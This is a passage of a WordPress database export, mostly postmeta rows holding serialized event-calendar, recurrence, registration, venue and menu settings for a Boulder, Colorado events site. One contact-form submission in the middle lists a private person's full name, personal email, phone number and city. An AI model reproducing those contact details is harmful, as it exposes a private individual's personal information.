;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(119241,262968,'_EventOrigin','events-calendar'),(119210,262967,'protect_children',''),(119204,262967,'_EventStartDate','2021-05-16 09:00:00'),(119205,262967,'_EventStartDateUTC','2021-05-16 15:00:00'),(119206,262967,'_EventEndDate','2021-05-16 10:15:00'),(119207,262967,'_EventEndDateUTC','2021-05-16 16:15:00'),(119246,262968,'_RTEClimitRegistrations','0'),(119208,262967,'_EventDuration','4500'),(119209,262967,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119211,262967,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119214,262967,'_RTECregistrationsDisabled','1'),(119215,262967,'_RTECdeadlineType','start'),(119216,262967,'_RTECwhoCanRegister','any'),(119217,262967,'_RTEClimitRegistrations','0'),(119218,262967,'_RTECmaxRegistrations','30'),(119219,262967,'boldgrid_hide_page_title','0'),(119212,262967,'_EventOrigin','events-calendar'),(119220,262967,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119221,262967,'_EventShowMapLink','1'),(119222,262967,'_EventShowMap','1'),(119223,262967,'_EventVenueID','262507'),(119224,262967,'_EventCurrencySymbol',''),(119225,262967,'_EventCurrencyPosition','prefix'),(119226,262967,'_EventCost',''),(119227,262967,'_EventURL',''),(119228,262967,'_EventTimezone','America/Denver'),(119229,262967,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(119247,262968,'_RTECmaxRegistrations','30'),(119239,262968,'protect_children',''),(119233,262968,'_EventStartDate','2021-06-20 09:00:00'),(119234,262968,'_EventStartDateUTC','2021-06-20 15:00:00'),(119235,262968,'_EventEndDate','2021-06-20 10:15:00'),(119236,262968,'_EventEndDateUTC','2021-06-20 16:15:00'),(119248,262968,'boldgrid_hide_page_title','0'),(119237,262968,'_EventDuration','4500'),(119238,262968,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119240,262968,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119243,262968,'_RTECregistrationsDisabled','1'),(119244,262968,'_RTECdeadlineType','start'),(119245,262968,'_RTECwhoCanRegister','any'),(35857,225786,'_tribe_modified_fields','a:34:{s:12:\"_EventOrigin\";i:1576681193;s:13:\"_thumbnail_id\";i:1607508541;s:24:\"boldgrid_hide_page_title\";i:1576681193;s:16:\"_EventRecurrence\";i:1607509915;s:17:\"_EventShowMapLink\";i:1576681193;s:13:\"_EventShowMap\";i:1576681193;s:13:\"_EventVenueID\";i:1607508621;s:15:\"_EventStartDate\";i:1607509914;s:13:\"_EventEndDate\";i:1607509914;s:18:\"_EventStartDateUTC\";i:1607509914;s:16:\"_EventEndDateUTC\";i:1607509914;s:14:\"_EventDuration\";i:1607509915;s:20:\"_EventCurrencySymbol\";i:1576681193;s:22:\"_EventCurrencyPosition\";i:1576681193;s:10:\"_EventCost\";i:1576681193;s:9:\"_EventURL\";i:1576681193;s:14:\"_EventTimezone\";i:1576681193;s:18:\"_EventTimezoneAbbr\";i:1576681193;s:12:\"_dp_original\";i:1576681193;s:27:\"_EventNextPendingRecurrence\";i:1576681413;s:16:\"tribe_events_cat\";i:1608139398;s:10:\"_edit_last\";i:1576681261;s:10:\"post_title\";i:1607509914;s:12:\"post_content\";i:1607509914;s:11:\"post_status\";i:1576681413;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"protect_children\";i:1606922583;s:26:\"_RTECregistrationsDisabled\";i:1606922583;s:17:\"_RTECdeadlineType\";i:1606922583;s:19:\"_RTECwhoCanRegister\";i:1606922583;s:23:\"_RTEClimitRegistrations\";i:1606922583;s:21:\"_RTECmaxRegistrations\";i:1606922583;s:22:\"_EventHideFromUpcoming\";i:1607508489;s:12:\"_wp_old_slug\";i:1607509914;}'),(35864,225786,'_EventShowMap','1'),(103466,225786,'_RTECmaxRegistrations','30'),(112696,225786,'_wp_old_slug','letters-of-light-and-sound-1-2'),(122499,263256,'_EventStartDateUTC','2021-11-07 19:00:00'),(122504,263256,'_EventOrigin','events-calendar'),(122505,263256,'_EventOrigin','events-calendar'),(122498,263256,'_EventStartDate','2021-11-07 12:00:00'),(103483,225018,'protect_children',''),(103484,225018,'_RTECregistrationsDisabled','1'),(103485,225018,'_RTECdeadlineType','start'),(103486,225018,'_RTECwhoCanRegister','any'),(103487,225018,'_RTEClimitRegistrations','0'),(103488,225018,'_RTECmaxRegistrations','30'),(35861,225786,'boldgrid_hide_page_title','1'),(35856,225786,'_tribe_modified_fields','a:34:{s:12:\"_EventOrigin\";i:1576681193;s:13:\"_thumbnail_id\";i:1607508541;s:24:\"boldgrid_hide_page_title\";i:1576681193;s:16:\"_EventRecurrence\";i:1607509915;s:17:\"_EventShowMapLink\";i:1576681193;s:13:\"_EventShowMap\";i:1576681193;s:13:\"_EventVenueID\";i:1607508621;s:15:\"_EventStartDate\";i:1607509914;s:13:\"_EventEndDate\";i:1607509914;s:18:\"_EventStartDateUTC\";i:1607509914;s:16:\"_EventEndDateUTC\";i:1607509914;s:14:\"_EventDuration\";i:1607509915;s:20:\"_EventCurrencySymbol\";i:1576681193;s:22:\"_EventCurrencyPosition\";i:1576681193;s:10:\"_EventCost\";i:1576681193;s:9:\"_EventURL\";i:1576681193;s:14:\"_EventTimezone\";i:1576681193;s:18:\"_EventTimezoneAbbr\";i:1576681193;s:12:\"_dp_original\";i:1576681193;s:27:\"_EventNextPendingRecurrence\";i:1576681413;s:16:\"tribe_events_cat\";i:1608139398;s:10:\"_edit_last\";i:1576681261;s:10:\"post_title\";i:1607509914;s:12:\"post_content\";i:1607509914;s:11:\"post_status\";i:1576681413;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"protect_children\";i:1606922583;s:26:\"_RTECregistrationsDisabled\";i:1606922583;s:17:\"_RTECdeadlineType\";i:1606922583;s:19:\"_RTECwhoCanRegister\";i:1606922583;s:23:\"_RTEClimitRegistrations\";i:1606922583;s:21:\"_RTECmaxRegistrations\";i:1606922583;s:22:\"_EventHideFromUpcoming\";i:1607508489;s:12:\"_wp_old_slug\";i:1607509914;}'),(35863,225786,'_EventShowMapLink','1'),(35859,225786,'_tribe_modified_fields','a:34:{s:12:\"_EventOrigin\";i:1576681193;s:13:\"_thumbnail_id\";i:1607508541;s:24:\"boldgrid_hide_page_title\";i:1576681193;s:16:\"_EventRecurrence\";i:1607509915;s:17:\"_EventShowMapLink\";i:1576681193;s:13:\"_EventShowMap\";i:1576681193;s:13:\"_EventVenueID\";i:1607508621;s:15:\"_EventStartDate\";i:1607509914;s:13:\"_EventEndDate\";i:1607509914;s:18:\"_EventStartDateUTC\";i:1607509914;s:16:\"_EventEndDateUTC\";i:1607509914;s:14:\"_EventDuration\";i:1607509915;s:20:\"_EventCurrencySymbol\";i:1576681193;s:22:\"_EventCurrencyPosition\";i:1576681193;s:10:\"_EventCost\";i:1576681193;s:9:\"_EventURL\";i:1576681193;s:14:\"_EventTimezone\";i:1576681193;s:18:\"_EventTimezoneAbbr\";i:1576681193;s:12:\"_dp_original\";i:1576681193;s:27:\"_EventNextPendingRecurrence\";i:1576681413;s:16:\"tribe_events_cat\";i:1608139398;s:10:\"_edit_last\";i:1576681261;s:10:\"post_title\";i:1607509914;s:12:\"post_content\";i:1607509914;s:11:\"post_status\";i:1576681413;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"protect_children\";i:1606922583;s:26:\"_RTECregistrationsDisabled\";i:1606922583;s:17:\"_RTECdeadlineType\";i:1606922583;s:19:\"_RTECwhoCanRegister\";i:1606922583;s:23:\"_RTEClimitRegistrations\";i:1606922583;s:21:\"_RTECmaxRegistrations\";i:1606922583;s:22:\"_EventHideFromUpcoming\";i:1607508489;s:12:\"_wp_old_slug\";i:1607509914;}'),(35862,225786,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2021-01-12 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-12 20:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128906,263459,'_RTECregistrationsDisabled','1'),(35833,225693,'_EventShowMapLink','1'),(35834,225693,'_EventShowMap','1'),(35835,225693,'_VenueShowMapLink','1'),(35836,225693,'_VenueShowMap','1'),(35837,225693,'_VenueAddress','528 18th Street'),(35838,225693,'_VenueCity','Boulder'),(35839,225693,'_VenueCountry','United States'),(35840,225693,'_VenueProvince',''),(35841,225693,'_VenueState','CO'),(35842,225693,'_VenueZip','80302'),(35843,225693,'_VenuePhone',''),(35844,225693,'_VenueURL',''),(35845,225693,'_VenueStateProvince','CO'),(35846,225693,'_VenueOverwriteCoords','0'),(35847,225693,'boldgrid_hide_page_title','1'),(35848,225786,'_EventOrigin','events-calendar'),(35849,225786,'_tribe_modified_fields','a:34:{s:12:\"_EventOrigin\";i:1576681193;s:13:\"_thumbnail_id\";i:1607508541;s:24:\"boldgrid_hide_page_title\";i:1576681193;s:16:\"_EventRecurrence\";i:1607509915;s:17:\"_EventShowMapLink\";i:1576681193;s:13:\"_EventShowMap\";i:1576681193;s:13:\"_EventVenueID\";i:1607508621;s:15:\"_EventStartDate\";i:1607509914;s:13:\"_EventEndDate\";i:1607509914;s:18:\"_EventStartDateUTC\";i:1607509914;s:16:\"_EventEndDateUTC\";i:1607509914;s:14:\"_EventDuration\";i:1607509915;s:20:\"_EventCurrencySymbol\";i:1576681193;s:22:\"_EventCurrencyPosition\";i:1576681193;s:10:\"_EventCost\";i:1576681193;s:9:\"_EventURL\";i:1576681193;s:14:\"_EventTimezone\";i:1576681193;s:18:\"_EventTimezoneAbbr\";i:1576681193;s:12:\"_dp_original\";i:1576681193;s:27:\"_EventNextPendingRecurrence\";i:1576681413;s:16:\"tribe_events_cat\";i:1608139398;s:10:\"_edit_last\";i:1576681261;s:10:\"post_title\";i:1607509914;s:12:\"post_content\";i:1607509914;s:11:\"post_status\";i:1576681413;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"protect_children\";i:1606922583;s:26:\"_RTECregistrationsDisabled\";i:1606922583;s:17:\"_RTECdeadlineType\";i:1606922583;s:19:\"_RTECwhoCanRegister\";i:1606922583;s:23:\"_RTEClimitRegistrations\";i:1606922583;s:21:\"_RTECmaxRegistrations\";i:1606922583;s:22:\"_EventHideFromUpcoming\";i:1607508489;s:12:\"_wp_old_slug\";i:1607509914;}'),(35850,225786,'_EventOrigin','events-calendar'),(35851,225786,'_EventOrigin','events-calendar'),(35852,225786,'_EventOrigin','events-calendar'),(35853,225786,'_EventOrigin','events-calendar'),(35854,225786,'_EventOrigin','events-calendar'),(35855,225786,'_tribe_modified_fields','a:34:{s:12:\"_EventOrigin\";i:1576681193;s:13:\"_thumbnail_id\";i:1607508541;s:24:\"boldgrid_hide_page_title\";i:1576681193;s:16:\"_EventRecurrence\";i:1607509915;s:17:\"_EventShowMapLink\";i:1576681193;s:13:\"_EventShowMap\";i:1576681193;s:13:\"_EventVenueID\";i:1607508621;s:15:\"_EventStartDate\";i:1607509914;s:13:\"_EventEndDate\";i:1607509914;s:18:\"_EventStartDateUTC\";i:1607509914;s:16:\"_EventEndDateUTC\";i:1607509914;s:14:\"_EventDuration\";i:1607509915;s:20:\"_EventCurrencySymbol\";i:1576681193;s:22:\"_EventCurrencyPosition\";i:1576681193;s:10:\"_EventCost\";i:1576681193;s:9:\"_EventURL\";i:1576681193;s:14:\"_EventTimezone\";i:1576681193;s:18:\"_EventTimezoneAbbr\";i:1576681193;s:12:\"_dp_original\";i:1576681193;s:27:\"_EventNextPendingRecurrence\";i:1576681413;s:16:\"tribe_events_cat\";i:1608139398;s:10:\"_edit_last\";i:1576681261;s:10:\"post_title\";i:1607509914;s:12:\"post_content\";i:1607509914;s:11:\"post_status\";i:1576681413;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"protect_children\";i:1606922583;s:26:\"_RTECregistrationsDisabled\";i:1606922583;s:17:\"_RTECdeadlineType\";i:1606922583;s:19:\"_RTECwhoCanRegister\";i:1606922583;s:23:\"_RTEClimitRegistrations\";i:1606922583;s:21:\"_RTECmaxRegistrations\";i:1606922583;s:22:\"_EventHideFromUpcoming\";i:1607508489;s:12:\"_wp_old_slug\";i:1607509914;}'),(94911,261933,'protect_children',''),(94912,261933,'_edit_lock','1613946974:2'),(94913,261933,'_edit_last','2'),(94914,261933,'_wp_page_template','default'),(94915,261933,'passster_activate_protection',NULL),(94916,261933,'passster_protection_type','password'),(94917,261933,'boldgrid_hide_page_title','0'),(94918,261933,'boldgrid_in_page_containers','1'),(94919,261933,'bgseo_robots_index','index'),(94920,261933,'bgseo_robots_follow','follow'),(94875,261921,'protect_children',''),(94876,261921,'_menu_item_type','post_type'),(94877,261921,'_menu_item_menu_item_parent','247332'),(94878,261921,'_menu_item_object_id','261866'),(94879,261921,'_menu_item_object','page'),(94880,261921,'_menu_item_target',''),(94881,261921,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(94882,261921,'_menu_item_xfn',''),(94883,261921,'_menu_item_url',''),(96827,262272,'_field_286','Susan '),(96828,262272,'_field_287','Arroyo'),(96829,262272,'_field_288','susanm.arroyo@yahoo.com'),(96830,262272,'_field_289','(720) 560-1185'),(96831,262272,'_field_290','Denver'),(96832,262272,'_field_293','esa-initiator-raelin-harp-denver-metro-east'),(96833,262272,'_field_294','I just received the pink slip for my 6th initiation.  I could call you, but wanted to test this website.'),(96834,262272,'_form_id','32'),(96835,262272,'_seq_num','2'),(141913,32074,'passster_activate_global_protection',NULL),(141912,261866,'passster_activate_global_protection',NULL),(104099,205232,'_edit_lock','1607022812:2'),(104100,262441,'protect_children',''),(104101,262441,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1607071445;s:12:\"_EventOrigin\";i:1607071445;s:13:\"_thumbnail_id\";i:1607071861;s:24:\"boldgrid_hide_page_title\";i:1607071445;s:17:\"_EventShowMapLink\";i:1607071445;s:13:\"_EventShowMap\";i:1607071445;s:15:\"_EventStartDate\";i:1607071861;s:13:\"_EventEndDate\";i:1607071861;s:18:\"_EventStartDateUTC\";i:1607071861;s:16:\"_EventEndDateUTC\";i:1607071861;s:14:\"_EventDuration\";i:1607071861;s:20:\"_EventCurrencySymbol\";i:1607071445;s:22:\"_EventCurrencyPosition\";i:1607071445;s:10:\"_EventCost\";i:1607071445;s:9:\"_EventURL\";i:1607071445;s:14:\"_EventTimezone\";i:1607071445;s:18:\"_EventTimezoneAbbr\";i:1607071445;s:27:\"_EventNextPendingRecurrence\";i:1607071445;s:26:\"_RTECregistrationsDisabled\";i:1607071445;s:17:\"_RTECdeadlineType\";i:1607071445;s:19:\"_RTECwhoCanRegister\";i:1607071445;s:23:\"_RTEClimitRegistrations\";i:1607071445;s:21:\"_RTECmaxRegistrations\";i:1607071445;s:16:\"_EventRecurrence\";i:1607071445;s:18:\"_RTECnumRegistered\";i:1607071445;s:12:\"_dp_original\";i:1607071445;s:13:\"_EventVenueID\";i:1607071445;s:16:\"tribe_events_cat\";i:1609185788;s:10:\"_edit_last\";i:1607071468;s:12:\"post_content\";i:1607072314;s:10:\"post_title\";i:1607071652;s:11:\"post_status\";i:1607071861;}'),(104102,262441,'_EventOrigin','events-calendar'),(104103,262441,'protect_children',''),(104104,262441,'protect_children',''),(104105,262441,'protect_children',''),(104106,262441,'protect_children',''),(104107,262441,'protect_children',''),(104108,262441,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1607071445;s:12:\"_EventOrigin\";i:1607071445;s:13:\"_thumbnail_id\";i:1607071861;s:24:\"boldgrid_hide_page_title\";i:1607071445;s:17:\"_EventShowMapLink\";i:1607071445;s:13:\"_EventShowMap\";i:1607071445;s:15:\"_EventStartDate\";i:1607071861;s:13:\"_EventEndDate\";i:1607071861;s:18:\"_EventStartDateUTC\";i:1607071861;s:16:\"_EventEndDateUTC\";i:1607071861;s:14:\"_EventDuration\";i:1607071861;s:20:\"_EventCurrencySymbol\";i:1607071445;s:22:\"_EventCurrencyPosition\";i:1607071445;s:10:\"_EventCost\";i:1607071445;s:9:\"_EventURL\";i:1607071445;s:14:\"_EventTimezone\";i:1607071445;s:18:\"_EventTimezoneAbbr\";i:1607071445;s:27:\"_EventNextPendingRecurrence\";i:1607071445;s:26:\"_RTECregistrationsDisabled\";i:1607071445;s:17:\"_RTECdeadlineType\";i:1607071445;s:19:\"_RTECwhoCanRegister\";i:1607071445;s:23:\"_RTEClimitRegistrations\";i:1607071445;s:21:\"_RTECmaxRegistrations\";i:1607071445;s:16:\"_EventRecurrence\";i:1607071445;s:18:\"_RTECnumRegistered\";i:1607071445;s:12:\"_dp_original\";i:1607071445;s:13:\"_EventVenueID\";i:1607071445;s:16:\"tribe_events_cat\";i:1609185788;s:10:\"_edit_last\";i:1607071468;s:12:\"post_content\";i:1607072314;s:10:\"post_title\";i:1607071652;s:11:\"post_status\";i:1607071861;}'),(104064,262435,'_VenueShowMap','1'),(104065,262435,'_VenueAddress',''),(104066,262435,'_VenueCity',''),(104067,262435,'_VenueCountry',''),(104068,262435,'_VenueProvince',''),(104069,262435,'_VenueState',''),(104070,262435,'_VenueZip',''),(119098,262963,'_RTECregistrationsDisabled','1'),(119099,262963,'_RTECdeadlineType','start'),(119096,262963,'_EventOrigin','events-calendar'),(119716,262989,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1608755008;s:12:\"_EventOrigin\";i:1608755008;s:13:\"_thumbnail_id\";i:1608755836;s:24:\"boldgrid_hide_page_title\";i:1608755008;s:17:\"_EventShowMapLink\";i:1608755008;s:13:\"_EventShowMap\";i:1608755008;s:15:\"_EventStartDate\";i:1608755836;s:13:\"_EventEndDate\";i:1608755836;s:18:\"_EventStartDateUTC\";i:1608755836;s:16:\"_EventEndDateUTC\";i:1608755836;s:14:\"_EventDuration\";i:1608755836;s:20:\"_EventCurrencySymbol\";i:1608755008;s:22:\"_EventCurrencyPosition\";i:1608755008;s:10:\"_EventCost\";i:1608755008;s:9:\"_EventURL\";i:1608755008;s:14:\"_EventTimezone\";i:1608755008;s:18:\"_EventTimezoneAbbr\";i:1608755008;s:27:\"_EventNextPendingRecurrence\";i:1608755008;s:26:\"_RTECregistrationsDisabled\";i:1608756215;s:17:\"_RTECdeadlineType\";i:1608755008;s:19:\"_RTECwhoCanRegister\";i:1608755008;s:23:\"_RTEClimitRegistrations\";i:1608755008;s:21:\"_RTECmaxRegistrations\";i:1608755008;s:16:\"_EventRecurrence\";i:1608755008;s:18:\"_RTECnumRegistered\";i:1608755008;s:12:\"_dp_original\";i:1608755008;s:13:\"_EventVenueID\";i:1608755008;s:16:\"tribe_events_cat\";i:1609185778;s:10:\"_edit_last\";i:1608755167;s:12:\"post_content\";i:1608756633;s:11:\"post_status\";i:1608755836;s:10:\"post_title\";i:1608755955;}'),(119729,262989,'_EventShowMap',''),(119731,262989,'_EventEndDate','2021-01-11 16:00:00'),(119717,262989,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1608755008;s:12:\"_EventOrigin\";i:1608755008;s:13:\"_thumbnail_id\";i:1608755836;s:24:\"boldgrid_hide_page_title\";i:1608755008;s:17:\"_EventShowMapLink\";i:1608755008;s:13:\"_EventShowMap\";i:1608755008;s:15:\"_EventStartDate\";i:1608755836;s:13:\"_EventEndDate\";i:1608755836;s:18:\"_EventStartDateUTC\";i:1608755836;s:16:\"_EventEndDateUTC\";i:1608755836;s:14:\"_EventDuration\";i:1608755836;s:20:\"_EventCurrencySymbol\";i:1608755008;s:22:\"_EventCurrencyPosition\";i:1608755008;s:10:\"_EventCost\";i:1608755008;s:9:\"_EventURL\";i:1608755008;s:14:\"_EventTimezone\";i:1608755008;s:18:\"_EventTimezoneAbbr\";i:1608755008;s:27:\"_EventNextPendingRecurrence\";i:1608755008;s:26:\"_RTECregistrationsDisabled\";i:1608756215;s:17:\"_RTECdeadlineType\";i:1608755008;s:19:\"_RTECwhoCanRegister\";i:1608755008;s:23:\"_RTEClimitRegistrations\";i:1608755008;s:21:\"_RTECmaxRegistrations\";i:1608755008;s:16:\"_EventRecurrence\";i:1608755008;s:18:\"_RTECnumRegistered\";i:1608755008;s:12:\"_dp_original\";i:1608755008;s:13:\"_EventVenueID\";i:1608755008;s:16:\"tribe_events_cat\";i:1609185778;s:10:\"_edit_last\";i:1608755167;s:12:\"post_content\";i:1608756633;s:11:\"post_status\";i:1608755836;s:10:\"post_title\";i:1608755955;}'),(119728,262989,'_EventShowMapLink',''),(119733,262989,'_EventEndDateUTC','2021-01-11 23:00:00'),(119734,262989,'_EventDuration','3600'),(119735,262989,'_EventCurrencySymbol',''),(119736,262989,'_EventCurrencyPosition','prefix'),(119737,262989,'_EventCost',''),(119738,262989,'_EventURL',''),(119739,262989,'_EventTimezone','America/Denver'),(119740,262989,'_EventTimezoneAbbr','MST'),(119741,262989,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(119742,262989,'_RTECregistrationsDisabled','1'),(119743,262989,'_RTECdeadlineType','start'),(119744,262989,'_RTECwhoCanRegister','any'),(119745,262989,'_RTEClimitRegistrations','0'),(119746,262989,'_RTECmaxRegistrations','30'),(119747,262989,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119748,262989,'_RTECnumRegistered','0'),(119751,262989,'_dp_original','262422'),(119750,262989,'_EventVenueID','262435'),(119752,262989,'_edit_lock','1609185778:2'),(119753,262989,'_edit_last','2'),(119754,262990,'_wp_attached_file','2020/12/seashell-1.jpg'),(119755,262990,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:470;s:6:\"height\";i:264;s:4:\"file\";s:22:\"2020/12/seashell-1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"seashell-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"seashell-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"seashell-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(128870,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTime